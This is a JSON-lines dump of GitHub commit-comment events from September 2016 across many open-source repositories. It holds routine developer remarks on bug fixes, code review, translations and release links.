{"id":"4512822013","type":"CommitCommentEvent","actor":{"login":"daftspunk"},"repo":{"name":"rainlab/location-plugin"},"payload":{"comment":{"id":18891254,"position":null,"line":null,"path":null,"commit_id":"b3ba2d5f90efb1247c5be68fdcf9fe3e79a28751","created_at":"2016-09-03T22:01:36Z","updated_at":"2016-09-03T22:01:36Z","body":"Fixed by 627a3bbaa1cb3679fd1988b92c1e27297b6f9cad\r\n\r\nNothing to do with seed file, execution logic error"}},"created_at":"2016-09-03T22:01:36Z"}
{"id":"4512822133","type":"CommitCommentEvent","actor":{"login":"jagerman"},"repo":{"name":"aldanor/pybind11"},"payload":{"comment":{"id":18891255,"position":16,"line":770,"path":"include/pybind11/cast.h","commit_id":"7de049a0f06edb3bca8b46ceb0790b991dfb97f4","created_at":"2016-09-03T22:01:43Z","updated_at":"2016-09-03T22:01:43Z","body":"I think `std::is_reference<typename std::remove_cv<Tuple>::type>::value...` will do the same thing (without needing `nth` to be declared at all)."}},"created_at":"2016-09-03T22:01:43Z"}
{"id":"4512824045","type":"CommitCommentEvent","actor":{"login":"everaldo"},"repo":{"name":"LaraDock/laradock"},"payload":{"comment":{"id":18891256,"position":null,"line":null,"path":null,"commit_id":"d44142785276eea4803cb1a2a39fabe07980817b","created_at":"2016-09-03T22:03:27Z","updated_at":"2016-09-03T22:03:27Z","body":"Hi! Why are you exposing connection through SSH?\r\n\r\nI pulled the updates and couldn't run the containers, because workspace clashes with php-fpm: both are exposing port 22.\r\n\r\nThanks"}},"created_at":"2016-09-03T22:03:27Z"}
{"id":"4512824324","type":"CommitCommentEvent","actor":{"login":"sigsegv-mvm"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":18891257,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-03T22:03:42Z","updated_at":"2016-09-03T22:03:42Z","body":"@sgtaziz And if there's a particular amount of money that would be needed for, say, a month of hosting (just read-only hosting of the existing database, no bug fixes, basically just that), then let us know what that figure is and I'm sure we could find a way to work it out."}},"created_at":"2016-09-03T22:03:42Z"}
{"id":"4512824372","type":"CommitCommentEvent","actor":{"login":"rkitover"},"repo":{"name":"rkitover/vimpager"},"payload":{"comment":{"id":18891258,"position":null,"line":null,"path":null,"commit_id":"0c12a062363e751e830acc49c2ec402aaf4e89d4","created_at":"2016-09-03T22:03:43Z","updated_at":"2016-09-03T22:03:43Z","body":"@kAworu Yes! Thanks for looking, updating."}},"created_at":"2016-09-03T22:03:43Z"}
{"id":"4512824563","type":"CommitCommentEvent","actor":{"login":"epifanio"},"repo":{"name":"epifanio/SKA"},"payload":{"comment":{"id":18891259,"position":null,"line":null,"path":null,"commit_id":"1825e1c982760097c1f218c0a79ddc6c24d89d60","created_at":"2016-09-03T22:03:54Z","updated_at":"2016-09-03T22:03:54Z","body":"@GeOnoveva please review those informations"}},"created_at":"2016-09-03T22:03:54Z"}
{"id":"4512824673","type":"CommitCommentEvent","actor":{"login":"escalonn"},"repo":{"name":"zijistark/ck2utils"},"payload":{"comment":{"id":18891260,"position":null,"line":null,"path":null,"commit_id":"dde5fe4087df0cdd87e89adc4d229b695ae26022","created_at":"2016-09-03T22:04:01Z","updated_at":"2016-09-03T22:04:01Z","body":"ew, you're going 7,1,2,3,4,5,6"}},"created_at":"2016-09-03T22:04:01Z"}
{"id":"4512825004","type":"CommitCommentEvent","actor":{"login":"catwongnyc"},"repo":{"name":"catwongnyc/HW_08-27"},"payload":{"comment":{"id":18891261,"position":null,"line":null,"path":null,"commit_id":"90e5068639ab69b495245ae234e646baffdf01b8","created_at":"2016-09-03T22:04:21Z","updated_at":"2016-09-03T22:04:21Z","body":"Add 6-13"}},"created_at":"2016-09-03T22:04:21Z"}
{"id":"4512825119","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18891262,"position":1,"line":1,"path":".eslintrc.js","commit_id":"078387f5f675a9b2f260b0015d2adf0061715361","created_at":"2016-09-03T22:04:28Z","updated_at":"2016-09-03T22:04:28Z","body":"working in vscode for me"}},"created_at":"2016-09-03T22:04:28Z"}
{"id":"4512826408","type":"CommitCommentEvent","actor":{"login":"t4nk074"},"repo":{"name":"t4nk074/angband"},"payload":{"comment":{"id":18891263,"position":null,"line":null,"path":null,"commit_id":"bc384983ed6ed1fb2c23cc2b5b74fb643520e5b1","created_at":"2016-09-03T22:05:30Z","updated_at":"2016-09-03T22:05:30Z","body":"It just occured to me that resizing a term is almost the same operation as popping it and pushing a new one.... hm."}},"created_at":"2016-09-03T22:05:30Z"}
{"id":"4512826652","type":"CommitCommentEvent","actor":{"login":"ElementalCrisis"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":18891264,"position":null,"line":null,"path":null,"commit_id":"56d23759ae33150cd564a6a27fc4e30dae38f29c","created_at":"2016-09-03T22:05:44Z","updated_at":"2016-09-03T22:05:44Z","body":"I forgot to commit  this when I tagged 3.6.0.4. \r\n\r\nJust some bugs that stopped JMM from updating database."}},"created_at":"2016-09-03T22:05:44Z"}
{"id":"4512828260","type":"CommitCommentEvent","actor":{"login":"rkitover"},"repo":{"name":"rkitover/vimpager"},"payload":{"comment":{"id":18891269,"position":null,"line":null,"path":null,"commit_id":"0c12a062363e751e830acc49c2ec402aaf4e89d4","created_at":"2016-09-03T22:07:14Z","updated_at":"2016-09-03T22:07:14Z","body":"Fixed in d0e0104."}},"created_at":"2016-09-03T22:07:14Z"}
{"id":"4512831216","type":"CommitCommentEvent","actor":{"login":"Workshop2"},"repo":{"name":"TotalJobsGroup/Syringe"},"payload":{"comment":{"id":18891276,"position":null,"line":null,"path":null,"commit_id":"74a8bc48b982b024bc4bedec39e5a4bb1ca1727b","created_at":"2016-09-03T22:09:56Z","updated_at":"2016-09-03T22:09:56Z","body":"#218"}},"created_at":"2016-09-03T22:09:56Z"}
{"id":"4512832162","type":"CommitCommentEvent","actor":{"login":"poutros"},"repo":{"name":"AuroraWright/Luma3DS"},"payload":{"comment":{"id":18891280,"position":null,"line":null,"path":null,"commit_id":"bd992fca15616ece6c7f6c14cd5768e0abaab013","created_at":"2016-09-03T22:10:43Z","updated_at":"2016-09-03T22:10:43Z","body":"https://github.com/ahezard/NitroHax/releases\r\n\r\nThe latest release of nitrohax loads without patches."}},"created_at":"2016-09-03T22:10:43Z"}
{"id":"4512833354","type":"CommitCommentEvent","actor":{"login":"elieserdejesus"},"repo":{"name":"elieserdejesus/JamTaba"},"payload":{"comment":{"id":18891282,"position":12,"line":204,"path":"src/resources/css/themes/Volcano/NinjamWindow.css","commit_id":"6b4e8a89f7c06b19373db43f26ee319d07982877","created_at":"2016-09-03T22:11:45Z","updated_at":"2016-09-03T22:11:45Z","body":"@jonjamcam , now is possible use custom colors for progress dialog in **NinjamWindow.css**\r\n![image](https://cloud.githubusercontent.com/assets/1012741/18227861/f8448f7a-7209-11e6-877f-9f69f9b738e6.png)"}},"created_at":"2016-09-03T22:11:45Z"}
{"id":"4512834418","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"athoik/enigma2"},"payload":{"comment":{"id":18891284,"position":null,"line":null,"path":null,"commit_id":"e787c6e70b89269a096392349084ced5a5b8ff35","created_at":"2016-09-03T22:12:42Z","updated_at":"2016-09-03T22:12:42Z","body":"This commit causes a problem for me. Tested on osminiplus. Wrong tuner type is selected. \r\n\r\nSo when tuner type is dvb-c all the satellite options are displayed... and... when tuner type is dvb-s all the cable options are displayed.\r\n\r\n![dvb-s](https://cloud.githubusercontent.com/assets/2067864/18227875/399af016-7234-11e6-8baf-f65bdb3ded7a.jpg)\r\n\r\n![dvb-c](https://cloud.githubusercontent.com/assets/2067864/18227876/4613f5b8-7234-11e6-802c-bd3c355f7ede.jpg)\r\n\r\n"}},"created_at":"2016-09-03T22:12:42Z"}
{"id":"4512835042","type":"CommitCommentEvent","actor":{"login":"mephinet"},"repo":{"name":"foswiki/DocumentViewerPlugin"},"payload":{"comment":{"id":18891285,"position":6,"line":10,"path":"lib/Foswiki/Plugins/DocumentViewerPlugin.pm","commit_id":"ca6aeee23b2a3bdd4b34a0911e704f398bc392b3","created_at":"2016-09-03T22:13:18Z","updated_at":"2016-09-03T22:13:18Z","body":"shouldn't this read 1.2 or 1.02?"}},"created_at":"2016-09-03T22:13:18Z"}
{"id":"4512837421","type":"CommitCommentEvent","actor":{"login":"AbeOmor"},"repo":{"name":"sarmadhashmi/Coursity"},"payload":{"comment":{"id":18891287,"position":null,"line":null,"path":null,"commit_id":"2105c6646b5386a2ecd330a6b53a417ea9e0db8b","created_at":"2016-09-03T22:15:35Z","updated_at":"2016-09-03T22:15:35Z","body":"addresses #31"}},"created_at":"2016-09-03T22:15:35Z"}
{"id":"4512838024","type":"CommitCommentEvent","actor":{"login":"thanelmas"},"repo":{"name":"ensozos/iTravel"},"payload":{"comment":{"id":18891288,"position":null,"line":null,"path":null,"commit_id":"9e69953a18a6888aae09cb9dec75cc53e708019d","created_at":"2016-09-03T22:16:12Z","updated_at":"2016-09-03T22:16:12Z","body":"It is animated also!"}},"created_at":"2016-09-03T22:16:12Z"}
{"id":"4512840023","type":"CommitCommentEvent","actor":{"login":"brboone"},"repo":{"name":"chrisfu/TuneIn.bundle"},"payload":{"comment":{"id":18891290,"position":null,"line":null,"path":null,"commit_id":"d59720b4ab2c5656581e3d7b64df5e5c7e513a11","created_at":"2016-09-03T22:17:56Z","updated_at":"2016-09-03T22:17:56Z","body":"thanks the latest change has fixed the issue for me"}},"created_at":"2016-09-03T22:17:56Z"}
{"id":"4512842761","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/desktop-settings"},"payload":{"comment":{"id":18891294,"position":null,"line":null,"path":null,"commit_id":"cbb654d98a97de577ef6afcfb85bde2fe2e761da","created_at":"2016-09-03T22:20:25Z","updated_at":"2016-09-03T22:20:25Z","body":"@philm @udeved "}},"created_at":"2016-09-03T22:20:25Z"}
{"id":"4512843775","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/desktop-settings"},"payload":{"comment":{"id":18891295,"position":null,"line":null,"path":null,"commit_id":"cbb654d98a97de577ef6afcfb85bde2fe2e761da","created_at":"2016-09-03T22:21:23Z","updated_at":"2016-09-03T22:21:23Z","body":"See explanations in commit message."}},"created_at":"2016-09-03T22:21:23Z"}
{"id":"4512845697","type":"CommitCommentEvent","actor":{"login":"leonardosnt"},"repo":{"name":"uEssentials/uEssentials"},"payload":{"comment":{"id":18891298,"position":null,"line":null,"path":null,"commit_id":"c197cb9a9965ccc7d7de6cd97dd80c95bee92616","created_at":"2016-09-03T22:23:17Z","updated_at":"2016-09-03T22:23:17Z","body":"https://github.com/uEssentials/uEssentials/releases/tag/1.2.8.3"}},"created_at":"2016-09-03T22:23:17Z"}
{"id":"4512846164","type":"CommitCommentEvent","actor":{"login":"persona5"},"repo":{"name":"xerpi/libftpvita"},"payload":{"comment":{"id":18891299,"position":null,"line":null,"path":null,"commit_id":"82ecb9d85ce3dde1d6c0f7f459fb3ee18b021514","created_at":"2016-09-03T22:23:45Z","updated_at":"2016-09-03T22:23:45Z","body":"ok, I'll check now."}},"created_at":"2016-09-03T22:23:45Z"}
{"id":"4512848843","type":"CommitCommentEvent","actor":{"login":"chungy"},"repo":{"name":"freedoom/freedoom"},"payload":{"comment":{"id":18891300,"position":null,"line":null,"path":null,"commit_id":"47546f6d0c56da7ed642afe52c1b46e6848e4970","created_at":"2016-09-03T22:25:50Z","updated_at":"2016-09-03T22:25:50Z","body":"It was actually the correct use of quotes -- GitHub's parser just doesn't support AsciiDoc 100%\r\n\r\nThis would be better repaired by using the left/right quotation mark codepoints. The only reason for the doubled backticks and single quotes was that it's the AsciiDoc syntax to generate the left/right in final output, without using anything beyond ASCII..."}},"created_at":"2016-09-03T22:25:50Z"}
{"id":"4512849302","type":"CommitCommentEvent","actor":{"login":"akankshakap20"},"repo":{"name":"akankshakap20/Projectassignment2"},"payload":{"comment":{"id":18891301,"position":null,"line":null,"path":null,"commit_id":"ef5fef38e5f388111e087b48bbbd30043072b8ec","created_at":"2016-09-03T22:26:15Z","updated_at":"2016-09-03T22:26:15Z","body":"Check now, are those changes successful?"}},"created_at":"2016-09-03T22:26:15Z"}
{"id":"4512851872","type":"CommitCommentEvent","actor":{"login":"markwal"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18891302,"position":27,"line":112,"path":"src/utils/SparseLineGrid.h","commit_id":"3a06f49fba3c800ae9ef80e49e6e9acf50d4e561","created_at":"2016-09-03T22:28:36Z","updated_at":"2016-09-03T22:28:36Z","body":"Nevermind.  I think I was incorrect based on a misunderstanding of what was trying to happen here.  I think the only problem is that this algorithm only works in the positive coordinate space and it may only be a problem with the terminus because it doesn't properly compute the last row/column due to truncation."}},"created_at":"2016-09-03T22:28:36Z"}
{"id":"4512852924","type":"CommitCommentEvent","actor":{"login":"athoik"},"repo":{"name":"athoik/enigma2"},"payload":{"comment":{"id":18891303,"position":null,"line":null,"path":null,"commit_id":"e787c6e70b89269a096392349084ced5a5b8ff35","created_at":"2016-09-03T22:29:32Z","updated_at":"2016-09-03T22:29:32Z","body":"Do you have those https://github.com/athoik/enigma2/commit/68c443210de96ef0dcd207e2eb7c3f1f4ddf9c05 , https://github.com/athoik/enigma2/commit/63dc50f1159042c19c9ba7bd7dc3af42673b04b6\r\n\r\nAlso make sure you clean you settings, because wrong settings might be written because those commits where missing."}},"created_at":"2016-09-03T22:29:32Z"}
{"id":"4512853621","type":"CommitCommentEvent","actor":{"login":"rschaerer"},"repo":{"name":"sinndrin/sinndrin.github.io"},"payload":{"comment":{"id":18891304,"position":6,"line":16,"path":"blog/_posts/2016-07-18-fairphone-2-ersatzteile.markdown","commit_id":"e89ec7e5f4ac7772c945c83390783066953a9139","created_at":"2016-09-03T22:30:04Z","updated_at":"2016-09-03T22:30:04Z","body":"@TraGe: mit commit @990a55d hab ich deinen link in einen call to action button geändert und auch noch den link relativ gemacht zum projektverzeichnis (anstatt mit http://www.sinndrin.ch/). Was denkst du?"}},"created_at":"2016-09-03T22:30:04Z"}
{"id":"4512854606","type":"CommitCommentEvent","actor":{"login":"lightmare"},"repo":{"name":"mapnik/node-mapnik"},"payload":{"comment":{"id":18891305,"position":12,"line":12,"path":"scripts/is_pr_merge.sh","commit_id":"240bedcbeeb8d8583706bbca61b87c27b1a29758","created_at":"2016-09-03T22:30:50Z","updated_at":"2016-09-03T22:30:50Z","body":"@springmeyer proved working since https://github.com/mapnik/mapnik/commit/6960c85cd29815b3cb32a5914c86c41436b04bd2 ;)"}},"created_at":"2016-09-03T22:30:50Z"}
{"id":"4512857056","type":"CommitCommentEvent","actor":{"login":"epifanio"},"repo":{"name":"epifanio/SKA"},"payload":{"comment":{"id":18891394,"position":null,"line":null,"path":null,"commit_id":"476ad9663a8654eeb03f72130c8b219f584348d7","created_at":"2016-09-03T22:32:51Z","updated_at":"2016-09-03T22:32:51Z","body":"I renamed the file to .md so github recognize it as markdown file and will render it properly"}},"created_at":"2016-09-03T22:32:51Z"}
{"id":"4512860341","type":"CommitCommentEvent","actor":{"login":"jonjamcam"},"repo":{"name":"elieserdejesus/JamTaba"},"payload":{"comment":{"id":18891421,"position":null,"line":null,"path":null,"commit_id":"6b4e8a89f7c06b19373db43f26ee319d07982877","created_at":"2016-09-03T22:35:35Z","updated_at":"2016-09-03T22:35:35Z","body":"@elieserdejesus looks great!"}},"created_at":"2016-09-03T22:35:35Z"}
{"id":"4512867583","type":"CommitCommentEvent","actor":{"login":"sprunk"},"repo":{"name":"ZeroK-RTS/Zero-K-Infrastructure"},"payload":{"comment":{"id":18891426,"position":4,"line":122,"path":"Fixer/WikiPortingMW.cs","commit_id":"414b989850cfbdf7ec0442c1b6fd35d3f95cd732","created_at":"2016-09-03T22:42:25Z","updated_at":"2016-09-03T22:42:25Z","body":"loled"}},"created_at":"2016-09-03T22:42:25Z"}
{"id":"4512873336","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18891442,"position":null,"line":null,"path":null,"commit_id":"796156a6f927a3330dd7a041e585315415507075","created_at":"2016-09-03T22:48:01Z","updated_at":"2016-09-03T22:48:01Z","body":"See #4572"}},"created_at":"2016-09-03T22:48:01Z"}
{"id":"4512874273","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18891459,"position":33,"line":33,"path":"src/server/commandcontroller.h","commit_id":"276dd8672901916a2336bd295d6117d79a31514e","created_at":"2016-09-03T22:48:57Z","updated_at":"2016-09-03T22:48:57Z","body":"这个没办法，因为要有个help函数要做。最多改成迭代器作为参数。"}},"created_at":"2016-09-03T22:48:57Z"}
{"id":"4512876708","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18891528,"position":33,"line":118,"path":"src/server/server.cpp","commit_id":"276dd8672901916a2336bd295d6117d79a31514e","created_at":"2016-09-03T22:51:27Z","updated_at":"2016-09-03T22:51:27Z","body":"Internal指令是硬编码的，这些东西本来就是NEWorld本身提供的，自然指令也得是NEWorld本身提供。太长的话回头我挪出去呗。"}},"created_at":"2016-09-03T22:51:27Z"}
{"id":"4512876830","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18891531,"position":null,"line":null,"path":null,"commit_id":"276dd8672901916a2336bd295d6117d79a31514e","created_at":"2016-09-03T22:51:33Z","updated_at":"2016-09-03T22:51:33Z","body":"名字都差不多辣，改Controller主要是因为里面有个thread。至于改到shared的问题，这是因为client里指令不需要多线程。回头我会把接口改的通用一点的（比如弄个继承？）"}},"created_at":"2016-09-03T22:51:33Z"}
{"id":"4512878026","type":"CommitCommentEvent","actor":{"login":"bluedrops"},"repo":{"name":"acm-uiuc/rp2016"},"payload":{"comment":{"id":18891532,"position":null,"line":null,"path":null,"commit_id":"3b47df068a25a18807048f6af5a1b561e2495fe0","created_at":"2016-09-03T22:52:44Z","updated_at":"2016-09-03T22:52:44Z","body":"ah yeah; originally we decided to cut the bios a bit because the text was extremely small (basically unreadable) for certain screen sizes, and because the full bios would be in the pamphlets. \r\n\r\n![Image of text sizing](http://i.imgur.com/aL93Pjp.png)\r\n\r\nI ended up just redoing the speaker card layout entirely so that we had better breakpoints though, so the text length didn't end up being an issue. I'll restore that line to the bio."}},"created_at":"2016-09-03T22:52:44Z"}
{"id":"4512878626","type":"CommitCommentEvent","actor":{"login":"nimati"},"repo":{"name":"k9101/FCAlertView"},"payload":{"comment":{"id":18891534,"position":null,"line":null,"path":null,"commit_id":"2f4d2ce8a0d58dace2ec53e5b74e6702fc1fd523","created_at":"2016-09-03T22:53:26Z","updated_at":"2016-09-03T22:53:26Z","body":"Awesome, sounds good Kris! 👍 "}},"created_at":"2016-09-03T22:53:26Z"}
{"id":"4512878641","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18891535,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-03T22:53:27Z","updated_at":"2016-09-03T22:53:27Z","body":"m_ioService怎么被你干掉了……"}},"created_at":"2016-09-03T22:53:27Z"}
{"id":"4512880363","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18891536,"position":null,"line":null,"path":null,"commit_id":"e41bed97df41172bdfeeae82c92f13944cda3e1b","created_at":"2016-09-03T22:55:15Z","updated_at":"2016-09-03T22:55:15Z","body":"卧……槽……"}},"created_at":"2016-09-03T22:55:15Z"}
{"id":"4512881317","type":"CommitCommentEvent","actor":{"login":"fragglet"},"repo":{"name":"freedoom/freedoom"},"payload":{"comment":{"id":18891543,"position":null,"line":null,"path":null,"commit_id":"f49abf88c6af7a683861643f2414861909f8eb68","created_at":"2016-09-03T22:56:14Z","updated_at":"2016-09-03T22:56:14Z","body":"I've opened travis-ci/apt-package-whitelist#3332 to add deutex to the list of Travis approved packages. I'll disable Travis builds for now."}},"created_at":"2016-09-03T22:56:14Z"}
{"id":"4512884165","type":"CommitCommentEvent","actor":{"login":"iamakulov"},"repo":{"name":"ilyabirman/Likely"},"payload":{"comment":{"id":18891550,"position":null,"line":null,"path":null,"commit_id":"4ecbde6b3ca79622d663f0a84f43e63e21fed1db","created_at":"2016-09-03T22:59:24Z","updated_at":"2016-09-03T22:59:24Z","body":"This commit was replaced with beb00e1 later (with force push), so don’t take it into account."}},"created_at":"2016-09-03T22:59:24Z"}
{"id":"4512886449","type":"CommitCommentEvent","actor":{"login":"DaHelg"},"repo":{"name":"DaHelg/website"},"payload":{"comment":{"id":18891551,"position":null,"line":null,"path":null,"commit_id":"7db3d47de5b20417bc5e4c7b3b44e342f693b6e2","created_at":"2016-09-03T23:01:24Z","updated_at":"2016-09-03T23:01:24Z","body":"Ich bin _nicht_ sicher , ob das hier **richtig** ist...\r\n"}},"created_at":"2016-09-03T23:01:24Z"}
{"id":"4512886737","type":"CommitCommentEvent","actor":{"login":"iamakulov"},"repo":{"name":"ilyabirman/Likely"},"payload":{"comment":{"id":18891552,"position":9,"line":11,"path":"test.html","commit_id":"beb00e121bed40bf5ba3fcd4f59be377d7af1805","created_at":"2016-09-03T23:01:41Z","updated_at":"2016-09-03T23:01:41Z","body":"I’m actually expecting to rewrite or completely drop `factory.js` in #75 so I hope this work-around will be removed after that."}},"created_at":"2016-09-03T23:01:41Z"}
{"id":"4512887615","type":"CommitCommentEvent","actor":{"login":"sourabhgmti"},"repo":{"name":"sourabhgmti/J2EE"},"payload":{"comment":{"id":18891553,"position":null,"line":null,"path":null,"commit_id":"4ba3e604a0172e12ec11ebe01e79351ac497baa3","created_at":"2016-09-03T23:02:30Z","updated_at":"2016-09-03T23:02:30Z","body":"update"}},"created_at":"2016-09-03T23:02:30Z"}
{"id":"4512887995","type":"CommitCommentEvent","actor":{"login":"persona5"},"repo":{"name":"xerpi/libftpvita"},"payload":{"comment":{"id":18891554,"position":null,"line":null,"path":null,"commit_id":"0f09811673bccd737c69a46bba167cf84b8fc986","created_at":"2016-09-03T23:02:50Z","updated_at":"2016-09-03T23:02:50Z","body":"Now this works with WinSCP and other clients that actually ask for FEAT upon connection."}},"created_at":"2016-09-03T23:02:50Z"}
{"id":"4512888289","type":"CommitCommentEvent","actor":{"login":"morganlutz"},"repo":{"name":"infernoboy/surveillance-system"},"payload":{"comment":{"id":18891555,"position":null,"line":null,"path":null,"commit_id":"666676f79df49a47895b4c60447913afbaf88da1","created_at":"2016-09-03T23:03:08Z","updated_at":"2016-09-03T23:03:08Z","body":"disagree"}},"created_at":"2016-09-03T23:03:08Z"}
{"id":"4512888329","type":"CommitCommentEvent","actor":{"login":"DaHelg"},"repo":{"name":"DaHelg/website"},"payload":{"comment":{"id":18891556,"position":null,"line":null,"path":null,"commit_id":"7db3d47de5b20417bc5e4c7b3b44e342f693b6e2","created_at":"2016-09-03T23:03:10Z","updated_at":"2016-09-03T23:03:10Z","body":"Here comes another comment in line 5."}},"created_at":"2016-09-03T23:03:10Z"}
{"id":"4512897797","type":"CommitCommentEvent","actor":{"login":"erikabarberan"},"repo":{"name":"erikabarberan/Rubrica"},"payload":{"comment":{"id":18891571,"position":null,"line":null,"path":null,"commit_id":"566f690028c85478dfede6dabd53c70c658736e5","created_at":"2016-09-03T23:12:53Z","updated_at":"2016-09-03T23:12:53Z","body":" 566f690"}},"created_at":"2016-09-03T23:12:53Z"}
{"id":"4512900063","type":"CommitCommentEvent","actor":{"login":"littlebalup"},"repo":{"name":"littlebalup/VitaShell"},"payload":{"comment":{"id":18891572,"position":null,"line":null,"path":null,"commit_id":"ae7345cf865d6e77a004ccbac9a940e4e2e2b241","created_at":"2016-09-03T23:15:27Z","updated_at":"2016-09-03T23:15:27Z","body":"french translation including SYS_INFO : \r\n[french.txt](https://github.com/littlebalup/VitaShell/files/453683/french.txt)\r\n"}},"created_at":"2016-09-03T23:15:27Z"}
{"id":"4512901245","type":"CommitCommentEvent","actor":{"login":"Spam234"},"repo":{"name":"neocities/neocities"},"payload":{"comment":{"id":18891573,"position":null,"line":null,"path":null,"commit_id":"3cb7be6f353482d9639e443aafec69af1471e6b7","created_at":"2016-09-03T23:16:50Z","updated_at":"2016-09-03T23:16:50Z","body":"Wow"}},"created_at":"2016-09-03T23:16:50Z"}
{"id":"4512901710","type":"CommitCommentEvent","actor":{"login":"javelinanddart"},"repo":{"name":"CM-Tab-S/android_kernel_samsung_klimtwifi"},"payload":{"comment":{"id":18891574,"position":7,"line":91,"path":"drivers/media/video/exynos/fimc-is-mc2/fimc-is-sec-define.h","commit_id":"0a18ba1fab2f38879d07e4bd1831c166763fae0a","created_at":"2016-09-03T23:17:17Z","updated_at":"2016-09-03T23:17:17Z","body":"#endif?"}},"created_at":"2016-09-03T23:17:17Z"}
{"id":"4512901791","type":"CommitCommentEvent","actor":{"login":"javelinanddart"},"repo":{"name":"CM-Tab-S/android_kernel_samsung_klimtwifi"},"payload":{"comment":{"id":18891575,"position":14,"line":98,"path":"drivers/media/video/exynos/fimc-is-mc2/fimc-is-sec-define.h","commit_id":"0a18ba1fab2f38879d07e4bd1831c166763fae0a","created_at":"2016-09-03T23:17:21Z","updated_at":"2016-09-03T23:17:21Z","body":"#endif?"}},"created_at":"2016-09-03T23:17:21Z"}
{"id":"4512904109","type":"CommitCommentEvent","actor":{"login":"jruesga"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18891577,"position":null,"line":null,"path":null,"commit_id":"419f035a9811e467c68bc64d918654af4dace23d","created_at":"2016-09-03T23:19:30Z","updated_at":"2016-09-03T23:19:30Z","body":"I wonder if we should highlight unreviewed changes only in the dashboard (mimic the Gerrit behaviour)"}},"created_at":"2016-09-03T23:19:30Z"}
{"id":"4512904403","type":"CommitCommentEvent","actor":{"login":"d2dyno"},"repo":{"name":"flightlevel/Jackett"},"payload":{"comment":{"id":18891579,"position":null,"line":null,"path":null,"commit_id":"aa1e31a110e74156cab78f3bc0178dd1525bfea6","created_at":"2016-09-03T23:19:52Z","updated_at":"2016-09-03T23:19:52Z","body":"Awesome! Excellent work."}},"created_at":"2016-09-03T23:19:52Z"}
{"id":"4512906809","type":"CommitCommentEvent","actor":{"login":"Monte9"},"repo":{"name":"Monte9/HelloWorld-Go"},"payload":{"comment":{"id":18891581,"position":null,"line":null,"path":null,"commit_id":"fb4627a676c623eb2d9d6c44c589f2ce0fdf091d","created_at":"2016-09-03T23:22:31Z","updated_at":"2016-09-03T23:22:31Z","body":"Thanks much! @shurcooL "}},"created_at":"2016-09-03T23:22:31Z"}
{"id":"4512907741","type":"CommitCommentEvent","actor":{"login":"d2dyno"},"repo":{"name":"Jackett/Jackett"},"payload":{"comment":{"id":18891582,"position":null,"line":null,"path":null,"commit_id":"aa1e31a110e74156cab78f3bc0178dd1525bfea6","created_at":"2016-09-03T23:23:44Z","updated_at":"2016-09-03T23:23:44Z","body":"Awesome! Excellent work."}},"created_at":"2016-09-03T23:23:44Z"}
{"id":"4512908044","type":"CommitCommentEvent","actor":{"login":"invy"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":18891583,"position":1,"line":1,"path":"far2l/vtlogcpp","commit_id":"9946c212db4b25ddad923962e62b8c5e761247e1","created_at":"2016-09-03T23:24:06Z","updated_at":"2016-09-03T23:24:06Z","body":"duplicate of vtlog.cpp, needs to be removed ;)"}},"created_at":"2016-09-03T23:24:06Z"}
{"id":"4512908422","type":"CommitCommentEvent","actor":{"login":"Stas321"},"repo":{"name":"simple-elf/sansa"},"payload":{"comment":{"id":18891585,"position":null,"line":null,"path":null,"commit_id":"c538caa1d872ca69d2d99f041211ad98068af2d4","created_at":"2016-09-03T23:24:33Z","updated_at":"2016-09-03T23:24:33Z","body":"По сути это почти полное повторение изначальной схемы Туркова. \r\nТолько теперь:\r\n1. Все по английски (вопрос: комменты будем оставлять тоже не инглише?)\r\n2. Добавлен блок \"опции шага\" - у Туркова были заранее заданные атрибуты. \r\nЗацени) "}},"created_at":"2016-09-03T23:24:33Z"}
{"id":"4512909973","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18891586,"position":null,"line":null,"path":null,"commit_id":"54bf5d5648b93eda90e5e13cd3fe796173049760","created_at":"2016-09-03T23:26:17Z","updated_at":"2016-09-03T23:26:17Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#fVM3MAT3RE-_1evhKmdKqg"}},"created_at":"2016-09-03T23:26:17Z"}
{"id":"4512910198","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18891587,"position":null,"line":null,"path":null,"commit_id":"2acf6898cf75672a8e9451393ab7bd07bff17a86","created_at":"2016-09-03T23:26:28Z","updated_at":"2016-09-03T23:26:28Z","body":"Actually this commit doesn't work as expected.\r\nIt needs to be fixed, as it checks the wrong attribute."}},"created_at":"2016-09-03T23:26:28Z"}
